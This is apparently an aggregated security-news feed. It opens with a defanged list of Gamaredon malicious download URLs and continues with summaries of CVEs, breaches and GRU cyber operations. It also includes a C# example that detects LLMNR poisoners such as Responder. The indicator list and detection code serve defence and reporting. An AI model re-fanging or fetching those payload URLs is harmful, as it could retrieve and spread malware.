hxxps://australian-prepared-derek-hands[.]trycloudflare[.]com/vo/nervous/bar[.]tar  URL  Malicious URL
hxxps://bush-worcester-houses-statements[.]trycloudflare[.]com/sudu/headlong/headache[.]rar  URL  Malicious URL
hxxps://expertise-sir-designs-columbus[.]trycloudflare[.]com/tu/lost/net[.]tar  URL  Malicious URL
hxxps://australian-prepared-derek-hands[.]trycloudflare[.]com/vomr/regards/bananas[.]tar  URL  Malicious URL
hxxps://australian-prepared-derek-hands[.]trycloudflare[.]com/vg/relax/quickly[.]tar  URL  Malicious URL
hxxps://nobody-principal-long-un[.]trycloudflare[.]com/pov/preparations/sequel[.]tar  URL  Malicious URL
hxxps://charter-blond-desired-promptly[.]trycloudflare[.]com/gmm/base/guarantee[.]tar  URL  Malicious URL
hxxps://wp-acm-configuration-fm[.]trycloudflare[.]com/uss/heap/September[.]tar  URL  Malicious URL
hxxps://expertise-sir-designs-columbus[.]trycloudflare[.]com/tu/grow/precaution[.]tar  URL  Malicious URL
hxxps://jurisdiction-xhtml-peace-surrey[.]trycloudflare[.]com/tcg/instruct/instructor[.]tar  URL  Malicious URL
hxxps://axxribute-homework-generator-lovers[.]trycloudflare[.]com/onp/decent2/decent[.]tar  URL  Malicious URL
hxxps://jurisdiction-xhtml-peace-surrey[.]trycloudflare[.]com/tcu/headphones/bananas[.]tar  URL  Malicious URL
hxxps://infected-gc-rhythm-yu[.]trycloudflare[.]com/ug/insurance/predicate[.]tar  URL  Malicious URL
hxxps://mind-apple-slightly-twiki[.]trycloudflare[.]com/ug/daytime2/daytime[.]tar  URL  Malicious URL
hxxps://infected-gc-rhythm-yu[.]trycloudflare[.]com/ug/quick/prediction[.]tar  URL  Malicious URL
hxxps://amsterdam-sheet-veteran-aka[.]trycloudflare[.]com/seeming/quay[.]tar  URL  Malicious URL
hxxps://longitude-powerpoint-geek-upgrade[.]trycloudflare[.]com/sg/precision2/precision[.]tar  URL  Malicious URL
hxxps://amsterdam-sheet-veteran-aka[.]trycloudflare[.]com/regions/headmaster[.]tar  URL  Malicious URL

The post Spear-Phishing in the Battlefield: Gamaredon's Ongoing Assault on Ukraine's Military appeared first on Cyble.

by CYBLE

Cequence Security announced a new partnership with Netskope. Through the partnership, Netskope customers can now leverage unique API threat intelligence from the Cequence Unified API Protection (UAP) platform to unlock insights into real-world threats and ultimately strengthen organizational security posture. Cybercriminals increasingly target APIs and deploy automated attacks such as bots, exposing organizations to data breaches, compliance violations, and financial loss. The explosive growth of APIs has created a complex threat landscape, requiring comprehensive solutions … More → The post Cequence Security partners with Netskope to provide protection for business-critical APIs appeared first on Help Net Security.

by Help Net Security

Welcome to Picus Security's monthly cyber threat intelligence roundup!

by Picus Security

From small businesses to giant corporations, sophisticated cyberattacks are both prevalent and effective at crippling data and services. To safeguard your business against these threats, you need a holistic approach that combines strong security measures with cyber insurance coverage.

Cybersecurity Threats Explained

The first part of securing your business is knowing the threats that can come at you. Common ones include:
Phishing Attacks: Cybercriminals pose as trustworthy sources and send fraudulent emails to get employees to share sensitive information.
Malware: Software intended to damage or disable computer systems on a network.
Ransomware: Malicious software that encrypts data and extorts a ransom for its release.
Data Breach: Unauthorized access to confidential information, often involving data theft or exposure.
DDoS Attacks: Flooding a service with traffic so it cannot function properly.
Understanding how these threats work is the basis for devising countermeasures, and the next step is to put strong cybersecurity in place so your business is not an easy target.

Steps to Implement Strong Cybersecurity

1. Secure Your Network. Protect your network from unauthorized access with firewalls, encryption, and secure Wi-Fi. Maintain software and hardware regularly to close the gaps cybercriminals take advantage of.
2. Strong Password Policies. Require employees to use complex passwords and change them periodically, and enable multi-factor authentication (MFA) for added protection.
3. Regular Software Updates. Keep everything updated, from operating systems to applications; scheduled updates usually include patches for known security flaws.
4. Employee Training. Short, regular sessions on identifying phishing emails, not reusing passwords, and handling software securely can be slotted in for a few minutes at the start of other training.
5. Data Encryption. Encrypt all sensitive data in transit and at rest so that, even if it is captured, it remains unreadable without the decryption key.
6. Back Up Data Regularly. Back up your data on an ongoing basis to a secure location. After a ransomware attack or data breach, backups let you restore your information instead of paying to get it back.
7. Access Control. Restrict sensitive data by role and follow the principle of least privilege: employees can reach only the data their job responsibilities require.

Cyber Security Insurance

However strong your defences, you must also plan for failure after a cyberattack, and cybersecurity insurance addresses that need. Policies, generally called cyber security insurance or cyber liability insurance, help protect businesses against the impact of these events, including the cost of:
Data Breach Notification: notifying affected parties of a data breach.
Legal Fees: legal representation and staying compliant with applicable laws.
Ransom Payments: in a ransomware attack, insurance can contribute to the ransom and recovery costs.
Business Interruption: lost income when a cyberattack shuts down business operations.
Crisis Management: public relations costs to manage the aftermath of a cyber incident.

Why is Cyber Security Insurance Needed?

Cyberattacks can lead to huge financial losses. Cyber security insurance acts as a financial backstop, so your business can recover without breaking the bank.
Reputation Management: your reputation is at stake after a cyberattack, and insurance may cover public relations work to restore trust with customers and stakeholders.
Peace of mind: with cyber security insurance in place, you can move on to the next challenge, such as growth or innovation.

Dedicated developers and sound programming practices are a shield against security failures, but even the most knowledgeable programmer should know exactly what to do if the site is hacked, because a slow response makes an intrusion worse. A clear incident response plan is imperative for dealing with the fallout of a cyberattack. Your plan should include:
Preparation: create a cybersecurity team and conduct regular practice sessions.
Detection: set up monitoring to catch possible intruders.
Containment: immediately isolate infected systems from the network to stop the attack spreading (isolation rather than powering off preserves volatile evidence for the investigation).
Removal: remove the malware from your network and patch the security holes that let it in.
Recovery: return to normal operations by restoring systems, applications, and data from backups.
Lessons Learned: review the incident and what was learned to strengthen defences against future attacks.

Keeping your company secure in the digital era means implementing comprehensive cybersecurity protocols, training employees, and holding cyber security coverage. If you know what to look out for and how to protect yourself, your business is ready for the ever-changing game of cyber threats. Cybersecurity insurance is one of the best ways to make sure your business has a backup plan in case things don't go as planned.

by The Cyber Express

Apache addressed a remote code execution vulnerability affecting the Apache OFBiz open-source enterprise resource planning (ERP) system. Apache fixed a high-severity vulnerability, tracked as CVE-2024-45195 (CVSS score: 7.5) affecting the Apache OFBiz open-source enterprise resource planning (ERP) system. Apache OFBiz® is an open source product for the automation of enterprise processes that includes framework components and business […]

by Security Affairs

Tewkesbury Borough Council has declared a major incident following a cyberattack that disrupted its operations on Wednesday afternoon. The attack prompted the council to shut down its systems immediately to contain it. As the investigation unfolds, the council's Chief Executive, Alistair Cunningham, has reassured the public that there is currently no evidence of data being removed or exfiltrated from its systems.

Tewkesbury Borough Council Cyberattack: Immediate Response and Ongoing Investigation

Upon discovering the attack, the council enacted "necessary cyber response steps", which included shutting down all systems to prevent further potential damage. An investigation is ongoing with assistance from the National Cyber Security Centre and the counter-fraud agency. The council has emphasized that there is no indication of personal data being compromised at this time. In an official statement, the council urged residents and customers to remain vigilant: be cautious of phishing emails and fraudulent activity, use strong and unique passwords, and change passwords promptly if any suspicious activity is detected. It also pointed to further guidance on the National Cyber Security Centre's website.

Public Communication and Support

In a statement to BBC Radio Gloucestershire, Cunningham said the discovery of unknown user accounts within the council's system led to the immediate shutdown. He confirmed that there was no evidence suggesting that data had been removed or exfiltrated, and stressed that the primary focus is on ensuring services for vulnerable residents while the extent of the attack is investigated.

"We have now re-established our phone line and are working on building new computers to expand our phone line capabilities," Cunningham said. He also pointed out that although the council's website remains operational and unaffected, normal services are limited. "I don't want someone who's at risk of losing their house or who can't feed their children not to be able to talk to my staff," Cunningham added.

To assist residents, council staff will be available at several locations:
Bishop's Cleeve Parish Council until 15:00 BST
Churchdown police bus at Tesco car park until 16:00 BST
Brockworth Community Centre at Court Road until 16:00 BST

Data Protection and Community Assurance

The council has appointed Graeme Simpson as the Data Protection Officer to handle inquiries related to the cyberattack. Residents concerned about the breach can contact Simpson via the email address provided in the council's communication. Despite the current challenges, the council is committed to providing updates and ensuring that residents are informed of any potential risks to their data. As part of its ongoing response, the council continues to work to understand the full scope of the attack. "We do not know the extent of the infiltration of our system," Cunningham admitted. He emphasized that not all services will be reopened until a thorough assessment is completed; waste and recycling services remain operational during this period. The Cyber Express reached out to Tewkesbury Borough Council for further details on the cyberattack. As of now, no additional official statements have been provided.

by The Cyber Express

Our new report investigates cyberthreats aimed at child gamers.

by Kaspersky

Veza announced a partnership with HashiCorp to deliver an integrated solution for solving modern identity security challenges. Together, the Veza Access Platform and HashiCorp Vault empower joint customers to strengthen their identity security posture by bringing least privilege to the management of secrets and keys. With cloud and SaaS investments maturing rapidly, coupled with the advent of new technologies like Generative AI (GenAI), the complexity of enterprise environments has created a significant challenge for security … More → The post Veza and HashiCorp join forces to help prevent credential exposure appeared first on Help Net Security.

by Help Net Security

Avis Car Rental has reported a data breach affecting customers' personal information after an unauthorized party accessed one of its business applications. The breach occurred between August 3 and August 6, 2024, compromising customer data, including names and other sensitive details. Avis says it has since contained the breach, launched an investigation with cybersecurity experts, … The post Avis Car Rental Suffers Data Breach Exposing Customer Information appeared first on CyberInsider.

by Cyber Insider

The US Securities and Exchange Commission (SEC) has accused a former CIRCOR executive of misleading financial disclosures. The allegations revolve around false statements made regarding the company's finances, and the case highlights the importance of accurate and transparent financial reporting. The SEC announced that it has filed fraud charges against Nicholas Bowerman, the former finance director of CIRCOR International Inc., a previously publicly traded technology manufacturer. According to the SEC, Bowerman's fraudulent activities led to misleading financial disclosures by the company from 2019 through 2021, impacting CIRCOR's public financial statements. The SEC also revealed that CIRCOR has settled related internal accounting charges, citing deficiencies in its financial controls that contributed to the situation.

The Allegations Against Bowerman

Bowerman, who was employed at Pipeline Engineering, a U.K.-based business unit of CIRCOR, is accused of engaging in a range of fraudulent practices over two years. The SEC's complaint asserts that between 2019 and 2021, Bowerman manipulated Pipeline Engineering's internal financial records, leading to inaccurate figures being incorporated into CIRCOR's consolidated financial statements. To carry out his fraudulent actions, Bowerman is alleged to have taken multiple deceptive steps, including manipulating account reconciliations, falsifying certifications, fabricating bank confirmation documents, and actively misleading CIRCOR's senior management and external auditors.
The SEC claims that these efforts concealed the true financial position of the business unit and resulted in CIRCOR’s public financial disclosures overstating its performance by millions of dollars for fiscal years 2019 and 2020, as well as for the nine-month period ending on October 3, 2021. CIRCOR’s Internal Control Failures In addition to the charges against Bowerman, the SEC’s findings also highlight broader issues within CIRCOR’s internal accounting systems. According to the SEC’s order, the company lacked sufficient internal controls to properly oversee its financial statement preparation, account reconciliation processes, and access to bank accounts. These gaps in oversight allowed Bowerman’s fraudulent activities to go undetected for an extended period. The SEC’s investigation revealed that CIRCOR’s inability to detect Bowerman’s misconduct contributed to the company’s overstated financial performance during the two-year period in question. The company was found to have violated the federal securities laws’ financial reporting, books and records, and internal accounting controls provisions. CIRCOR’s Response and Remedial Measures In response to the discovery of the fraudulent activities, CIRCOR took immediate action. The company self-reported the financial reporting violations to the SEC shortly after launching its own internal investigation. This proactive cooperation played a significant role in mitigating the SEC’s enforcement actions against CIRCOR. The SEC acknowledged CIRCOR’s extensive cooperation throughout the investigation, noting that the company provided detailed examples of Bowerman’s unauthorized financial adjustments, shared summaries of interviews with witnesses based outside the U.S., and made its employees and external forensic accountants available for questioning. The company also promptly implemented a range of remedial measures to address the identified deficiencies in its internal controls. 
Key actions taken by CIRCOR included: Strengthening its internal accounting controls. Hiring additional experienced finance and accounting personnel. Cancelling compensation that was scheduled to be paid to a former executive officer. These actions, coupled with CIRCOR’s cooperation with the SEC, led the Commission to decide against seeking a civil penalty against the company. According to Nicholas P. Grippo, Director of the SEC’s Philadelphia Regional Office, “While this matter involves serious violations of the securities laws, once the company became aware of the violations, it promptly self-reported, cooperated, and remediated the gaps in its accounting systems. As also reflected in other recent Commission resolutions, this kind of response by a corporate entity can lead to significant benefits including, as here, no penalty.” Charges Against Bowerman While CIRCOR has settled its case with the SEC, Bowerman faces a more severe set of legal consequences. The SEC has filed a complaint in the U.S. District Court for the District of Massachusetts, charging Bowerman with violations of multiple provisions of the federal securities laws, including those related to antifraud, financial reporting, books and records, and internal accounting controls. The SEC is seeking various forms of relief from Bowerman, including: Injunctive relief to prevent him from engaging in further securities law violations. Disgorgement of any ill-gotten gains, along with prejudgment interest. Civil penalties to further hold Bowerman accountable for his actions. These charges reflect the seriousness of Bowerman’s alleged misconduct, which undermined the integrity of CIRCOR’s financial disclosures and harmed investors who relied on the company’s public filings. As part of the SEC’s final order against CIRCOR, the company has agreed to cease and desist from future violations of the charged provisions of the securities laws.

by The Cyber Express

The U.S. government has indicted five Russian military intelligence officers from the GRU and one civilian for their role in a series of cyberattacks on Ukraine and NATO countries. In connection with this, the U.S. Department of State is offering a reward of up to $10 million for any information leading to their capture or … The post U.S. Offers $10M for Info on Five State-Backed Russian Hackers appeared first on CyberInsider.

by Cyber Insider

The United States and its allies state that Russia-linked threat actors operating under the GRU are behind global critical infrastructure attacks. The FBI, CISA, and NSA linked threat actors from Russia’s GRU Unit 29155 to global cyber operations since at least 2020. These operations include espionage, sabotage, and reputational damage. The United States and its […]

by Security Affairs

Veeam has published a new Security Bulletin addressing multiple critical vulnerabilities across its suite of products. The Veeam security bulletin, identified as KB ID: 4649, includes updates on Veeam Backup & Replication, Veeam ONE, Veeam Service Provider Console, Veeam Agent for Linux, Veeam Backup for Nutanix AHV, and Veeam Backup for Oracle Linux Virtualization Manager and Red Hat Virtualization. The security issues detailed in this bulletin highlight several high-severity vulnerabilities that could impact the security and functionality of Veeam's solutions. This article provides a short glimpse into these updates offered by the Veeam security bulletin.

Key Highlights from the Veeam Security Bulletin

Here's a detailed look at the vulnerabilities discovered and their respective fixes:

1. Veeam Backup & Replication

Several vulnerabilities affecting Veeam Backup & Replication 12.1.2.172 and earlier versions have been reported. These vulnerabilities include:
• CVE-2024-40711: This critical vulnerability allows unauthenticated remote code execution (RCE). Discovered by Florian Hauser of CODE WHITE GmbH, it carries a CVSS v3.1 score of 9.8.
• CVE-2024-40713: A high-severity vulnerability enabling a low-privileged user to alter Multi-Factor Authentication (MFA) settings, thus bypassing MFA. It has a CVSS v3.1 score of 8.8.
• CVE-2024-40710: This series of high-severity vulnerabilities allows remote code execution (RCE) under the service account and extraction of sensitive information. It also scores 8.8 on the CVSS v3.1 scale.
• CVE-2024-39718: Allows low-privileged users to remotely delete files on the system with service account permissions. It holds a CVSS v3.1 score of 8.1.
• CVE-2024-40714: A high-severity vulnerability in TLS certificate validation can let an attacker intercept sensitive credentials during restore operations, scoring 8.3 on the CVSS v3.1 scale.
• CVE-2024-40712: This path traversal vulnerability permits local privilege escalation (LPE) for an attacker with low-privileged access. It carries a CVSS v3.1 score of 7.8.
The solutions for these issues are included in Veeam Backup & Replication version 12.2 (build 12.2.0.334).

2. Veeam Agent for Linux

For Veeam Agent for Linux, version 6.1.2.178 and earlier are affected by:
• CVE-2024-40709: This high-severity vulnerability enables local privilege escalation to the root level and scores 7.8 on the CVSS v3.1 scale.
This issue is resolved in Veeam Agent for Linux version 6.2 (build 6.2.0.101), which is included with Veeam Backup & Replication 12.2.

3. Veeam ONE

Veeam ONE 12.1.0.3208 and earlier versions are affected by several vulnerabilities:
• CVE-2024-42024: Allows remote code execution on the Veeam ONE Agent machine with possession of service account credentials. It has a CVSS v3.1 score of 9.1.
• CVE-2024-42019: Grants access to the NTLM hash of the Veeam Reporter Service account, requiring user interaction. It scores 9.0 on the CVSS v3.1 scale.
• CVE-2024-42023: Enables low-privileged users to execute code with Administrator privileges remotely, with a severity score of 8.8.
• CVE-2024-42021: Allows attackers with valid access tokens to access saved credentials, scoring 7.5 on the CVSS v3.1 scale.
• CVE-2024-42022: Allows modification of product configuration files, also scoring 7.5.
• CVE-2024-42020: HTML injection vulnerability in Reporter Widgets, scoring 7.3.
These vulnerabilities are addressed in Veeam ONE v12.2 (build 12.2.0.4093).

4. Veeam Service Provider Console

The Veeam Service Provider Console (VSPC) 8.0.0.19552 and earlier versions have been identified with:
• CVE-2024-38650: A critical vulnerability permitting low-privileged attackers to access the NTLM hash of the service account on the VSPC server, scoring 9.9 on the CVSS v3.1 scale.
• CVE-2024-39714: Allows low-privileged users to upload arbitrary files, leading to remote code execution on the VSPC server. This issue also scores 9.9.
• CVE-2024-39715: Similar to CVE-2024-39714 but through REST API access, with a high severity score of 8.5.
• CVE-2024-38651: Allows low-privileged users to overwrite files, leading to remote code execution, with a CVSS v3.1 score of 8.5.
The fixes are included in Veeam Service Provider Console v8.1 (build 8.1.0.21377).

5. Veeam Backup for Nutanix AHV and Other Plug-Ins

Veeam Backup for Nutanix AHV Plug-In 12.5.1.8 and earlier, as well as Veeam Backup for Oracle Linux Virtualization Manager and Red Hat Virtualization Plug-In 12.4.1.45, are impacted by:
• CVE-2024-40718: Allows local privilege escalation through an SSRF vulnerability, with a severity score of 8.8 on the CVSS v3.1 scale.
These issues are resolved in Veeam Backup for Nutanix AHV Plug-In v12.6.0.632 and Veeam Backup for Oracle Linux Virtualization Manager and Red Hat Virtualization Plug-In v12.5.0.299, both included with Veeam Backup & Replication 12.2.

Conclusion

This comprehensive Veeam Security Bulletin outlines critical updates and fixes for multiple Veeam products. Users are advised to update to the latest versions of Veeam Backup & Replication, Veeam Agent for Linux, Veeam ONE, Veeam Service Provider Console, and other related products to mitigate these vulnerabilities. Regular updates and vigilant security practices remain essential in protecting against potential threats and ensuring the integrity of data protection solutions.

by The Cyber Express

The United States, along with its allies, has formally identified a group of Russian hackers, tracked under names such as Cadet Blizzard and Ember Bear, as responsible for large-scale attacks on U.S. and global critical infrastructure. These hackers are linked to Unit 29155 of Russia's Main Directorate of the General Staff of the Armed Forces (GRU), a military intelligence unit that has long been under scrutiny for its covert operations. In a joint advisory released by the Federal Bureau of Investigation (FBI), the Cybersecurity and Infrastructure Security Agency (CISA), and the National Security Agency (NSA), it was revealed that the GRU hackers, often junior officers from the GRU's 161st Specialist Training Center, have been involved in cyber sabotage since 2020, under the leadership and oversight of experienced members of Unit 29155. Beyond its cyber operations, the unit has also been linked to sabotage and assassination attempts throughout Europe.

WhisperGate Malware and Cyberattacks

The group gained significant notoriety in January 2022 when it deployed WhisperGate, a data-wiping malware, against Ukrainian organizations. The attacks were part of a broader campaign aimed at destabilizing Ukraine and interfering with the efforts of NATO and allied nations to support the country. This malware was a signal of the hackers' capabilities, marking a shift from cyber-espionage to outright data destruction. WhisperGate attacks began on January 13, 2022, focusing on disrupting Ukraine's defense and critical services. The joint advisory emphasizes that Unit 29155 is distinct from other well-known GRU-affiliated units, such as Units 26165 and 74455, which were responsible for previous cyberattacks in Europe and the U.S. Since early 2022, this group has pivoted its focus toward disrupting aid efforts for Ukraine, expanding its cyber toolkit to include methods that blend espionage with destruction. The joint advisory stresses that the hackers are honing their technical skills and building their experience by conducting more advanced cyber operations across various global regions.

Unit 29155: A Wide Range of Attacks Across Continents

According to U.S. intelligence, Unit 29155 has been responsible for a wide range of cyberattacks that have affected NATO countries, along with others in North America, Europe, Latin America, and Central Asia. Their tactics have included website defacement, public leaks of stolen data, and extensive infrastructure scanning to uncover vulnerabilities. These attacks have not been limited to Ukraine but have spread across multiple sectors, including energy, government services, and financial institutions. As a result, critical infrastructure across NATO member states has faced increasing risks of being compromised. The FBI has been tracking the activities of Unit 29155 closely, having detected over 14,000 domain scanning attempts targeting at least 26 NATO members and several European Union (EU) nations. These scans were aimed at identifying weaknesses in critical systems that could be exploited in future attacks.

U.S. Offers Reward for Key GRU Officers

In response to these attacks, the U.S. State Department announced a reward of up to $10 million for information leading to the identification or capture of five Russian military intelligence officers. These individuals are believed to be part of the GRU's Unit 29155 and include Vladislav Borovkov, Denis Igorevich Denisenko, Yuriy Denisov, Dmitry Yuryevich Goloshubov, and Nikolay Aleksandrovich Korchagin. These officers are accused of carrying out cyber operations that have harmed critical U.S. infrastructure, with particular emphasis on the energy, government, and aerospace sectors. Their cyber activities are linked to the sabotage of Western countries' efforts to support Ukraine and the disruption of various sectors critical to national security. In addition to the military officers, a civilian named Amin Timovich Stigal has also been indicted for his involvement in the WhisperGate attacks against Ukraine. This indictment, along with charges against the five GRU officers, highlights the seriousness of Russia's cyber operations and the coordinated efforts to bring those responsible to justice.

Protecting Critical Infrastructure: Recommendations

As Unit 29155 continues its cyber operations across the globe, organizations within critical infrastructure sectors are urged to enhance their defenses. Immediate actions recommended by cybersecurity authorities include:
• Patching vulnerabilities in systems to close potential entry points for cyberattacks.
• Implementing phishing-resistant multifactor authentication (MFA) to strengthen account security, particularly for services like webmail and virtual private networks (VPNs).
• Segmenting networks to contain any malicious activity should an intrusion occur.
These defensive strategies are especially important for organizations within sectors frequently targeted by Russian hackers, including energy, transportation, healthcare, and government services.

Global Concerns and Long-Term Implications

Since Russia's invasion of Ukraine in February 2022, cyberattacks have escalated in both scale and severity. Alongside the WhisperGate malware, other destructive tools like HermeticWiper and ransomware decoys have been used to cripple Ukrainian systems. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) and the FBI warned early on that such malware could easily spread beyond Ukraine, affecting global systems if defenses were not adequately prepared. Wednesday's announcement of the U.S. seizing 32 web domains linked to Russian disinformation campaigns highlights the broader cyber and information warfare being waged by Russia. These domains were part of a network aimed at spreading false information to influence the upcoming 2024 U.S. presidential election.

Tracking Cyber Threats: Industry and Government Coordination

The cybersecurity industry plays a critical role in identifying and mitigating threats posed by groups like Unit 29155. Leading cybersecurity firms and government agencies continuously track the activities of Russian cyber actors, under various naming conventions such as Cadet Blizzard (tracked by Microsoft) and Ember Bear (CrowdStrike). These cyber groups have demonstrated advanced capabilities in reconnaissance, scanning, and exploiting vulnerabilities in critical systems. As Unit 29155 continues its cyber operations, the global community remains on high alert. Efforts to strengthen critical infrastructure and improve cyber defenses have never been more critical. While the hunt for the Russian GRU officers involved in these attacks intensifies, the larger challenge remains how to effectively mitigate and defend against the growing cyber threats facing the world today.

by The Cyber Express

I asked for a calm August 2024 Patch Tuesday in last month’s forecast article and that came to pass. The updates released were limited to the regular operating systems and all forms of Office applications. Six zero-day vulnerabilities were announced, with five in the operating systems and one in the Office applications. There were 63 CVEs addressed in the Windows 10 operating systems and associated servers and 55 CVEs addressed in Windows 11. Overall, it … The post September 2024 Patch Tuesday forecast: Downgrade is the new exploit appeared first on Help Net Security.

by Help Net Security

Businesses run on SaaS solutions: nearly every business function relies on multiple cloud-based tech platforms and collaborative work tools like Slack, Google Workspace apps, Jira, Zendesk and others. We recently surveyed security leaders and CISOs on top data security priorities and challenges. We discovered that over 70% work in organizations using 50 or more SaaS solutions, and nearly a third of the respondents reported their organization’s SaaS environments include 200 or more apps. With so … The post Human firewalls are essential to keeping SaaS environments safe appeared first on Help Net Security.

by Help Net Security

Respotter is an open-source honeypot designed to detect attackers when they launch Responder within your environment. This application identifies active instances of Responder by exploiting its behavior when responding to any DNS query. Respotter leverages LLMNR, mDNS, and NBNS protocols to query a non-existent hostname (default: Loremipsumdolorsitamet). If any of these requests receive a response, Responder is likely operating on your network. Respotter can send webhooks to Slack, Teams, or Discord. It also supports sending … The post Respotter: Open-source Responder honeypot appeared first on Help Net Security.
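The detection trick described above, as an added example in C# that is not Respotter's own code: it builds an LLMNR query for the canary hostname, multicasts it, and reports every host that answers. Because no legitimate host owns that name, any answer is a poisoner such as Responder, and the answered address is the attacker's own. The NBNS and mDNS probes Respotter also sends use the same idea with different framing and are not shown here; the hostname, multicast group and port are the real LLMNR values, and everything else (class and method names, the 2 s timeout) is this example's choice.

```csharp
// Added illustration, not Respotter's code: an LLMNR canary query whose only legitimate answer
// is none, so any reply identifies a name poisoner on the segment.
using System;
using System.Collections.Generic;
using System.Net;
using System.Net.Sockets;
using System.Text;

public static class LlmnrCanary
{
    public const string Canary = "Loremipsumdolorsitamet";  // Respotter's default non-existent name
    static readonly IPEndPoint LlmnrGroup = new IPEndPoint(IPAddress.Parse("224.0.0.252"), 5355);

    static void PutU16(List<byte> buf, int v) { buf.Add((byte)(v >> 8)); buf.Add((byte)v); }
    static int GetU16(byte[] b, int off) => (b[off] << 8) | b[off + 1];

    // DNS wire-format name: length-prefixed labels, zero-terminated (LLMNR reuses the DNS format).
    public static byte[] EncodeName(string name)
    {
        var buf = new List<byte>();
        foreach (string label in name.Split('.'))
        {
            buf.Add((byte)label.Length);
            buf.AddRange(Encoding.ASCII.GetBytes(label));
        }
        buf.Add(0);
        return buf.ToArray();
    }

    // RFC 4795 query: 12-byte header (ID, flags, QD=1, AN=0, NS=0, AR=0) and one A/IN question.
    public static byte[] BuildQuery(string name, int txid)
    {
        var buf = new List<byte>();
        PutU16(buf, txid); PutU16(buf, 0x0000);
        PutU16(buf, 1); PutU16(buf, 0); PutU16(buf, 0); PutU16(buf, 0);
        buf.AddRange(EncodeName(name));
        PutU16(buf, 1); PutU16(buf, 1);   // QTYPE A, QCLASS IN
        return buf.ToArray();
    }

    static int SkipName(byte[] b, int off)
    {
        while (true)
        {
            int len = b[off];
            if (len == 0) return off + 1;
            if ((len & 0xC0) == 0xC0) return off + 2;   // compression pointer is two bytes
            off += 1 + len;
        }
    }

    // IPv4 addresses from the A answers of a response that matches our transaction id; empty otherwise.
    public static List<string> ParseResponse(byte[] b, int txid)
    {
        var addrs = new List<string>();
        if (b.Length < 12 || GetU16(b, 0) != txid || (GetU16(b, 2) & 0x8000) == 0) return addrs;
        int qd = GetU16(b, 4), an = GetU16(b, 6), off = 12;
        for (int i = 0; i < qd; i++) off = SkipName(b, off) + 4;   // skip QTYPE and QCLASS
        for (int i = 0; i < an; i++)
        {
            off = SkipName(b, off);
            int rtype = GetU16(b, off), rdlen = GetU16(b, off + 8);
            off += 10;                                              // TYPE, CLASS, TTL, RDLENGTH
            if (rtype == 1 && rdlen == 4)
                addrs.Add(new IPAddress(new[] { b[off], b[off + 1], b[off + 2], b[off + 3] }).ToString());
            off += rdlen;
        }
        return addrs;
    }

    // Multicasts the canary query and returns one line per host that answered it.
    public static List<string> Probe(int timeoutMs = 2000)
    {
        int txid = new Random().Next(1, 0xFFFF);
        var found = new List<string>();
        using (var udp = new UdpClient(0))
        {
            udp.Client.ReceiveTimeout = timeoutMs;
            byte[] query = BuildQuery(Canary, txid);
            udp.Send(query, query.Length, LlmnrGroup);
            try
            {
                while (true)
                {
                    var from = new IPEndPoint(IPAddress.Any, 0);
                    byte[] reply = udp.Receive(ref from);
                    foreach (string a in ParseResponse(reply, txid))
                        found.Add(from.Address + " answered " + Canary + " with " + a);
                }
            }
            catch (SocketException) { /* receive timeout: no more answers */ }
        }
        return found;
    }

    public static void Main()
    {
        List<string> hits = Probe();
        Console.WriteLine(hits.Count == 0 ? "No LLMNR poisoner answered."
                                          : string.Join(Environment.NewLine, hits));
    }
}
```

Run it from a host on the segment you want to watch, on a schedule, and alert on any non-empty result. Two caveats: LLMNR is link-local, so the probe only covers the broadcast domain it runs in, and Responder can be configured to answer only for selected names or to stay in analyze mode, in which case the canary draws no reply and the absence of a hit proves nothing.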

by Help Net Security

As cybercriminals continue to refine their methods, blending traditional strategies with new technologies, the financial toll on individuals and organizations has reached alarming levels. Businesses are also grappling with mounting cybercrime costs from ransomware and DDoS attacks, which can inflict hundreds of thousands of dollars in damage within minutes. These statistics highlight a growing concern: as cybercrime costs rise and threats become more complex and widespread, they impact organizations of all sizes. Old methods, new … The post The true cost of cybercrime for your business appeared first on Help Net Security.

by Help Net Security

Ransomware is an all-too-common occurrence: 83% of organizations have experienced at least one ransomware attack in the last year, 46% of respondents experienced four or more and 14% indicated they experienced 10 or more. Of those respondents who experienced at least one ransomware attack in the last year, 61% said it resulted in downtime of at least 24 hours, according to Onapsis. Source: Onapsis Of those organizations that experienced ransomware attacks, 89% said their Enterprise … The post 83% of organizations experienced at least one ransomware attack in the last year appeared first on Help Net Security.

by Help Net Security

Here’s a look at the most interesting products from the past week, featuring releases from Binarly, Bitdefender, Prompt Security, Revenera, Skyhigh Security, and Vanta. Bitdefender Security for Creators protects YouTube content creators and influencers from hackers Bitdefender Security for Creators safeguards content channels and social media accounts from takeovers and supports Windows, Mac, Android, and iOS. Set-up takes a few moments and connects to both content channel and owner. Once activated, Bitdefender continuously monitors for … The post New infosec products of the week: September 6, 2024 appeared first on Help Net Security.

by Help Net Security

Using this maturity model, security teams can make structured, measurable, and iterative improvements to their detection engineering teams.

by Elastic Security Lab

RansomHub claims to have breached Intermountain Planned Parenthood, stealing 93GB of data. The healthcare provider is investigating the…

by Hackread

New threats, an overburdened workforce, and regulatory pressures mean cloud service providers need a more resilient model than the shared responsibility framework. That's where "shared fate" comes in.

by Dark Reading

Unnamed government entities in the Middle East and Malaysia are the target of a persistent cyber campaign orchestrated by a threat actor known as Tropic Trooper since June 2023. "Sighting this group's [Tactics, Techniques, and Procedures] in critical governmental entities in the Middle East, particularly those related to human rights studies, marks a new strategic move for them," Kaspersky

by The Hacker News

Veeam has shipped security updates to address a total of 18 security flaws impacting its software products, including five critical vulnerabilities that could result in remote code execution. The list of shortcomings is below - CVE-2024-40711 (CVSS score: 9.8) - A vulnerability in Veeam Backup & Replication that allows unauthenticated remote code execution. CVE-2024-42024 (CVSS score: 9.1

by The Hacker News

by Dark Reading

Security researchers have discovered a cryptographic flaw that leaves the YubiKey 5 vulnerable to attack.

by WIRED Security News

Retail employees are being duped into divulging their credentials by typosquatting malvertisements.

by Dark Reading

In the past, the group has targeted different sectors in East and Southeast Asia, but recently has pivoted its focus to the Middle East, specifically to entities that publish human rights studies.

by Dark Reading

Singapore's health minister discusses aging populations and how AI can prepare nations for the inevitable.

by ZDNET Security

The malware, KTLVdoor, has already been found on more than 50 command-and-control servers and enables full control of any environment it compromises.

by Dark Reading

Veeam has released security updates addressing 18 high- and critical-severity flaws in Veeam Backup & Replication, Veeam Service Provider Console, and Veeam ONE. The most severe flaw included in the September 2024 security bulletin is a critical, […]

by Security Affairs

Working with the Treasury and Justice departments, the president has sanctioned anti-democratic Russian adversaries.

by Dark Reading

The post KnowBe4 Children’s Interactive Cybersecurity Activity Kit appeared first on National Cybersecurity Alliance.

